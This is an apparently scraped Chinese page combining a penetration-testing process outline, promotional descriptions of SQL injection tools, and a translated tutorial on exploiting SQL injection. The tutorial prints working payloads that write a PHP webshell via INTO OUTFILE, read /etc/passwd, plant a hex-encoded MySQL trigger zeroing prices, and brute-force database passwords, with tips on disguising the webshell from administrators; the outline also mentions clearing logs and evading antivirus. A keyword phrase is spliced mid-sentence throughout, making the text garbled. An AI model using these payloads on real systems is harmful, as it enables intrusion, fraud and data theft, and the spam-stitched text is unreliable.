sql渗透用什么工具,SQL渗透

导航：

• 1、数据渗透怎么操作
• 2、功能强大.操作简单的SQL注入工具是?
• 3、SQL注入工具都有哪些?
• 4、如何利用blind sql injection渗透

数据渗透怎么操作

一般渗透测试流程

1. 明确目标

l 确定范围：测试目标的范围、ip、域名、内外网、测试账户。

l 确定规则：能渗透到什么程度，所需要的时间、能否修改上传、能否提权、等等。

l 确定需求：web应用的漏洞、业务逻辑漏洞、人员权限管理漏洞、等等。

2. 信息收集、

l 方式：主动扫描，开放搜索等。

l 开放搜索：利用搜索引擎获得：后台、未授权页面、敏感url、等等。

l 基础信息：IP、网段、域名、端口。

l 应用信息：各端口的应用。例如web应用、邮件应用、等等。

l 系统信息：操作系统版本

l 版本信息：所有这些探测到的东西的版本。

l 服务信息：中间件的各类信息，插件信息。

l 人员信息：域名注册人员信息，web应用中发帖人的id，管理员姓名等。

l 防护信息：试着看能否探测到防护设备。

3. 漏洞探测

利用上一步中列出的各种系统，应用等使用相应的漏洞。

方法：

(1) 漏扫，awvs，IBM appscan等。

(2) 结合漏洞去exploit-db等位置找利用。

(3) 在网上寻找验证poc。

内容：

l 系统漏洞：系统没有及时打补丁

l WebSever漏洞：WebSever配置问题

l Web应用漏洞：Web应用开发问题

l 其它端口服务漏洞：各种21/8080(st2)/7001/22/3389

l 通信安全：明文传输，token在cookie中传送等。

4. 漏洞验证

将上一步中发现的有可能可以成功利用的全部漏洞都验证一遍。结合实际情况，搭建模拟环境进行试验。成功后再应用于目标中。

l 自动化验证：结合自动化扫描工具提供的结果

l 手工验证，根据公开资源进行验证

l 试验验证：自己搭建模拟环境进行验证

l 登陆猜解：有时可以尝试猜解一下登陆口的账号密码等信息

l 业务漏洞验证：如发现业务漏洞，要进行验证

公开资源的利用

l exploit-db/wooyun/

l google hacking

l 渗透代码网站

l 通用、缺省口令

l 厂商的漏洞警告等等。

5. 信息分析

为下一步实施渗透做准备。

l 精准打击：准备好上一步探测到的漏洞的exp，用来精准打击

l 绕过防御机制：是否有防火墙等设备，如何绕过

l 定制攻击路径：最佳工具路径，根据薄弱入口，高内网权限位置，最终目标

l 绕过检测机制：是否有检测机制，流量监控，杀毒软件，恶意代码检测等（免杀）

l 攻击代码：经过试验得来的代码，包括不限于xss代码，sql注入语句等

6. 获取所需

实施攻击：根据前几步的结果，进行攻击

l 获取内部信息：基础设施（网络连接，路由，拓扑等）

l 进一步渗透：内网入侵，敏感目标

l 持续性存在：一般我们对客户做渗透不需要。rookit，后门，添加管理账号，驻扎手法等

l 清理痕迹：清理相关日志（访问，操作），上传文件等

7. 信息整理

l 整理渗透工具：整理渗透过程中用到的代码，poc，exp等

l 整理收集信息：整理渗透过程中收集到的一切信息

l 整理漏洞信息：整理渗透过程中遇到的各种漏洞，各种脆弱位置信息

8. 形成报告

l 按需整理：按照之前第一步跟客户确定好的范围，需求来整理资料，并将资料形成报告

l 补充介绍：要对漏洞成因，验证过程和带来危害进行分析

l 修补建议：当然要对所有产生的问题提出合理高效安全的解决办法

流程总结

功能强大.操作简单的SQL注入工具是?

Pangolin翻译成中文即为穿山甲。之所以取名为穿山甲，是因为目前的网络安全通常都伴随着网络防火墙，只允许极少数的业务端口开放。而SQL注入正是这样的一个攻击途径，他的动作就像穿山甲一样会“打洞”。能够穿越看似强大的目标。这也是目前网络安全的现状。 Pangolin是一款帮助渗透测试人员进行Sql注入测试的安全工具。所谓的SQL注入测试就是通过利用目标网站的某个页面缺少对用户传递参数控制或者控制的不够好的情况下出现的漏洞，从而达到获取、修改、删除数据，甚至控制数据库服务器、Web服务器的目的的测试方法。Pangolin能够通过一系列非常简单的操作，达到最大化的攻击测试效果。它从检测注入开始到最后控制目标系统都给出了测试步骤。 过去有许多Sql注入工具，不过有些功能不完全，支持的数据库不够多，或者是速度比较慢。但是，在Pangolin发布以后，这些问题都得到了解决。 Pangolin是目前已有的注入工具中最好的。 这个是天空的下载连接

SQL注入工具都有哪些?

WebCruiser Web Vulnerability Scanner是一个功能不凡的Web应用漏洞扫描器，能够对整个网站进行漏洞扫描，并能够对发现的漏洞（SQL注入，跨站脚本）进行验证；它也可以单独进行漏洞验证。

网站爬虫（目录及文件）；

漏洞扫描（SQL注入，跨站脚本）；

漏洞验证（SQL注入，跨站脚本）；

SQL Server明文/字段回显/盲注；

MySQL字段回显/盲注；

Oracle字段回显/盲注；

DB2字段回显/盲注；

Access字段回显/盲注；

管理入口查找；

GET/Post/Cookie 注入；

搜索型注入延时；

自动从自带浏览器获取Cookie进行认证；

自动判断数据库类型；

自动获取关键词；

多线程；

高级：代理、敏感词替换/过滤；

报告；

如何利用blind sql injection渗透

如何利用blind sql injection渗透

0×01,介绍…

0×02,什么是Sql Injection..

0×03,一个系统后门(OS)Backdoor.

0×04,获得一个OS Shell

0×05,一个数据库后门(Database backdoor).

0×07,推荐的防御措施…

0×08,结论…

0×09,参考…

0×01,介绍

如果sql渗透用什么工具你正在读这篇文章那么sql渗透用什么工具我有理由相信你曾经听说过一种病毒，或者是它一种特洛伊木马或者蠕虫，这类恶意程序可以感染你的计算机系统。一旦你的计算机系统被感染，那么当你使被感染的计算机连接到互联网，它很可能会去感染其sql渗透用什么工具他的计算机。许多时候，恶意软件不仅仅只是从一台计算机传播到另一台，他们会针对每一台感染的计算机进行自身的变异。这些变化将会让病毒远程的控制每一台计算机并使它们在之后感染更多的计算机系统。这些病毒第一次执行时会复制一个小型的可执行文件到用户的磁盘上，这个可执行文件仅仅会监听在当前计算机系统未使用的端口上从而恶意软件可以在被感染主机连入互联网的任意时刻访问这台主机。这个小的可执行文件叫做后门(Backdoor)。sql渗透用什么工具我在这里已经简要的说明了后门的概念。

0×02,什么是Sql Injection

已经有超过1百万的文章讲述了什么是Sql注入并且怎样去发现和怎样去避免这类威胁，所以sql渗透用什么工具我不想再次重复。如果你需要了解一些关于Sql注入的背景知识，这里有一个介绍性文章的连接可以供你阅读。这篇文章末尾我也提供了一些参考资料可以让你针对这篇文章所讨论的话题获得更多的知识信息。

0×03,一个系统后门(OS)Backdoor

这篇文章的目的是利用Sql Injection执行各种各样的命令最终控制操作系统。为了运行系统命令，我们需要一个CMD shell,或者需要执行一些代码使得我们可以执行OS命令。让我们分别尝试一下这两种方法。

0×04,获得一个OS Shell

现在我们将写我们自己的代码使之可以让我们运行任意OS命令来控制操作系统。所以，从之前的文章中我们已经知道搜索部分的变量存在Sql Injection并且在question表中存在4个列名。作为提示，语句Harry Potter’ union select 1,2,3,4#将会出现错误：

现在，我们想插入可以执行系统命令的PHP代码。为了实现这个目的，我们使用MYsql提供的INTO OUTFILE特性。使用Using INTO OUTFILE，可以将查询的输出重定向到系统的文件中去。真因为如此，我们可以执行Harry Potter’ union select ‘TEXT INTO FILE’,2,3 INTO OUTFILE ‘/tmp/blah.txt’#，然后字符串‘TEXT INTO FILE’将会被存储在目录/tmp下的blah.txt中。如图：

现在我们将 ‘TEXT INTO FILE’替换成基本的PHP代码使之可以读取URL的参数来执行系统命令控制操作系统。我们使用这样的语句： Harry Potter’ union select “?system($_REQUEST['cmd']); ?”,2,3 INTO OUTFILE ‘/var/www/test/execcmd.php’# ，如图：

就是这样！但是还出现了很多我们根本不关心的书籍的内容。所以我调整了我的查询语句为：

‘ union select “? system($_REQUEST['cmd']); ?”,2,3 INTO OUTFILE ‘/var/www/test/execcmd.php’#并再次执行。

尽管这回还是返回了2和3，但是好多了。

现在我们访问execcmd.php并把命令[cat /etc.passwd]传递给我们想提交执行的参数。

成功了。通过我多次的尝试，这里有几点需要注意的事情。

–运行这条语句的数据库用户需要拥有FILE权限，否则不能执行INTO OUTFILE命令。

–在MySQL服务运行的主机中必须存在一个可写的Web目录，否则你不能访问你刚刚上传的Webshell。你可以将代码写入到总是可写的目录像/ttmp，但是你没有权限访问它。

一种简单的方式来实现OS Shell是使用SQLMap内置的特性。如果你读过我之前的文章，你会记得我使用过SQLMap。让我们通过SQLMap来完成同样的事情。

下面的OS shell截图是在使用SQLMap进行注入时加入了一个简单的参数并且在提示处选择了PHP Web Shell而获得的。

运行一个命令来检查我们是否已经获得了一个Shell。OK，没问题。

这实在是太容易了。

不幸的是，从‘破坏者’的角度来看这也同样是简单的。

现在有了这么简单快捷的方法你肯定不想再用之前的方法了，但是知道手动利用的方法总是有帮助的（这样当使用工具失败时你可以有另外的方法）。还有一件事需要注意，难获得了一

个WebShell时，请使用一个和Web目录中已经存在的文件十分相似的名字去命名。这会帮助你隐藏你的WebShell使之不会被管理员不经意间轻易的发现。

在开始下一类Backdoor之前，我将向你展示隐藏SQLMap的方法。你可以通过设置代理来运行SQLMap。

然后当SQLMap将实际的WebShell上传到可写目录的时候，brupSuite会拦截到一些请求，让我们看一下这些请求。

我们能看到一些熟悉的东西。让我们通过URL decode来确定一下。看一下在底部面板的蓝色高亮的部分。它显示出SQLMap正在使用INTO OUTFILE命令，和我们之前人工使用的方法是一样的。

最后，我们看一下SQLMap上传WebShell的内容，非常有意思，看一下底部的面板。

这就是关键，工具再一次的大大简化了我们本该花费大量时间进行的繁琐工作。

0×05,一个数据库后门(Database backdoor)

现在我们知道一个OS后门可以在Web应用存在SQL Injection时被植入到系统中。现在让我们看看如何在数据库中植入一个后门吧。在我们继续之前，我们需要一些了解一下backdoor function的相关知识。在OS backdoor中，我们直接访问了后门并且传递给它了一个命令；但在这里却并不会那么直接。当我们每一个插入的操作执行时，我们配置的后门会改变数据库中一些敏感数据的值。所以，每一本书在添加到数据库中时价格会被我们的后门设置成0，以至于人们可以免费“购买”这些书籍。这在真实的环境中可能会很快被发现。

所以我们在数据库中有一些叫做“触发器”的东西，基本的意思就是——“当某些我们希望发生的事情发生时，触动触发器去做另外一些事情”。这描述的确实太模糊了，然我们举一个更明显的例子。假如你是一个警察，某一时刻你看到一个连环杀手，你扣动扳机并且发射出一枚子弹对么？那么把他转换为我们之前的场景——有一个INSERT语句（杀手），一个Database trigger(枪手)开火了，那么动作(action)就是释放你之前已经配置(configured)好的子弹(bullet)。

下面使我们要写的一个MySQL触发器的例子：

delimiter #

CREATE TRIGGER price BEFORE INSERT ON books

for each row begin

set new.price=’0′;

end;#

delimiter ;

b)无论任何时候如果我们执行一个Insert语句，比如假如一本书，那么我们设置其价格为0.下面是它的意思：

a)设置默认的MySQL分隔符为’#'，因为默认的分隔符是’;'在MySQL作为特殊字符处理了，而我们需要将其作为数据处理。所以我们改变分隔符为’#'，表示’#'现在有一个特殊的含义。

c)终止触发器并将分隔符重置为’;'。

然我们使用Sql Injection将触发器复制到服务器上。下面是要作为搜索框输入的语句：

Harry Potter’ AND 1=0 union select 0×20,0×20,0×20 INTO OUTFILE ‘/var/www/test/g2′ LINES TERMINATED BY 0x64656c696d6974657220230a4352454154452054524947474552207072696365204245464f524520494e53455254204f4e20626f6f6b730a666f72206561636820726f7720626567696e0a736574206e65772e70726963653d2730273b0a656e643b230a64656c696d69746572203b#

我会快速解释一下这个查询语句—因为即使看起来它很复杂—其实不然。我们使用1=0因为我们对关于《Harry Potter》的查询结果并不感兴趣。0×20的位置只是查询了三次空格’space’；这是为了我可以仅仅得到想要重定向到文件’/var/www/test.g2′中的内容。然后LINES TERMINATED BY后面的部分是整个触发器使用hex函数转换后的形式(我是用的是Brup Decoder，不要坐在那儿浪费时间去手工转化它)。

让我们运行一下看看会在文件/var/www/test/g2中出现什么。

你注意到了最开始的几个空格了么？这就是我们之前看到的select 0×20,0×20,0×20的作用。之后的内容就显而易见了。

现在我们以某种方式执行这个查询然后我们的触发器会在每次一本书被插入时激活，这里有三种实现的方法。

a)多语句查询(Stacked Queries)—Harry Potter’ UNION blah blah blah;source /var/www/test/g2但是这事实上不会成功执行，因为PHP+MySQL不支持多语句查询。

b)滥用MySQL默认触发器行为(Abusing MySQL default trigger behavior)—这种方法我还没有测试过，不过在Stefano Di Paola的文章中被描述的非常清楚。尝试一下吧，我找时间也会测试一下。

c)使用SQL Injection工具比如SQLMap运行我们存放在/var/www/test/g2中保存的触发器。这是我们将要测试的方法。

我们来再次运行SQLMap并获得一个我们可以运行触发器的SQL shell。

看最后一行。不幸的是，只有当支持多语句查询时，这种方法才可以执行。这意味着上面的选项a，c意味着同一种情况。让我们通过代理来查看SQLMap的请求。

让我们在Sql-shell中执行一个简单的创建新数据库的语句—”create database boo;”并在Brup中查看。

我们可以看到，SQLMap尝试将它转换为一个SELECT查询。这将永远不会执行成功。从Burp相应的内容证实了这一点。

我能想到的唯一一种能够顺序执行我们的查询的可行办法包含以下几个步骤：

—猜解一个有效MySQL用户的密码。例如，你猜到root的密码是test123

—注入一个OS webshell后门。

—注入一个类似之前格式的触发器。

—现在通过在Webshell中运行MySQL命令来安装触发器。

我有几张截图来说明为什么这样是可行的。为了照顾初学者，这里有张截图表名当前不存在任何触发器。

假设我们已经猜解到了用户名和密码root和toor（通过Blind SQL暴力猜解mysql.user表）。现在我们反问Web shell并传递一个命令：

mysql -uUSERNAME -pPASSWORD DB NAME /var/www/test/g2

现在我们再来看一下数据库。

看到了我们的触发器。

现在我们来运行一个INSERT查询来检查我们的触发器是否会运行。然后所有Jeffrey Archer的书的价格会变得非常不可思议。

现在执行查询：

看最后一行。某些人可以不用支付他本认为应该支付的价格了。

现在我们直接执行一个INSERT查询来控制数据库。在真实环境中将会有一个表单来添加书籍，在后端很可能会有一个INSERT查询，这时触发器很有可能被触发执行。这是我没有创建另外一个表单的唯一原因。

明显地，一个大前提是我们能够猜解数据库的用户名和密码。下面有一个简单的思路可以让你实现这个目的。

—想一些常用的数据库用户名（比如MySQL的root）或者通过社会工程学获得一些。

—MySQL密码是通过哈希加密的，并不是明文。

你可以通过以下两种方式破解密码：

—通过SQL Injection将密码的Hash与密码明文列表对比。（参考我之前的文章）

—在WebShell中通过密码明文列表和一个特定的用户名来运行触发器。你可以写一个Perl或者Ruby脚本来为你做这些事情。尝试在遍历完明文密码列表之后插入一本书，或者在每次猜解后找出那个密码是正确的。

mysql -uroot -ptoor blindsql_test /var/www/test/g2

mysql -uroot -proot blindsql_test /var/www/test/g2

mysql -uroot -ptest blindsql_test /var/www/test/g2

mysql -uroot -ppassword blindsql_test /var/www/test/g2

0×07,推荐的防御措施

a)使用参数化查询来防御SQL注入攻击。

b)不要在Web目录中存在大量可写目录。

c)限制Web应用在后端查询数据库的用户的权限。为了实现这一点，不要给其分配FILE权限。

d)设置复杂的数据库密码和健壮的密码策略。

0×08,结论

这个问题的根源，是Web应用存在Sql注入弱点。修复它将会阻止这种威胁的发生。然而，知道不同的植入后门的方法还是有益的。许多恶意软件将会通过这种方式传播；也需要采取措施来防止它们。